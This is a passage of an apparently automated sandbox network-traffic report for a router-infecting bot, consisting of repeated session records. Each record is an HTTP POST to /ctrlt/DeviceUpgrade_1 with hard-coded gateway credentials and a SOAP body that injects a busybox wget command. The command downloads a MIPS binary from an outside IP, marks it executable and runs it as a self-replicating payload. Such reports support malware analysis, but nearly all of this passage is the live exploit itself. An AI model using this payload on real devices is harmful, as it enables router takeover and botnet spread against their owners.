                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1035192.168.2.235661241.133.35.5237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287636995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1036192.168.2.2339208169.23.202.13937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287657022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1037192.168.2.2342716197.82.37.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287658930 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1038192.168.2.2334568197.72.9.10037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287671089 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1039192.168.2.235093041.89.184.20937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287707090 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1040192.168.2.2342990157.212.210.19137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287723064 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1041192.168.2.235058041.245.145.15137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287729025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1042192.168.2.2356578157.167.112.9437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287853003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1043192.168.2.2343010197.130.80.6937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287869930 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1044192.168.2.2353252157.231.248.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287879944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
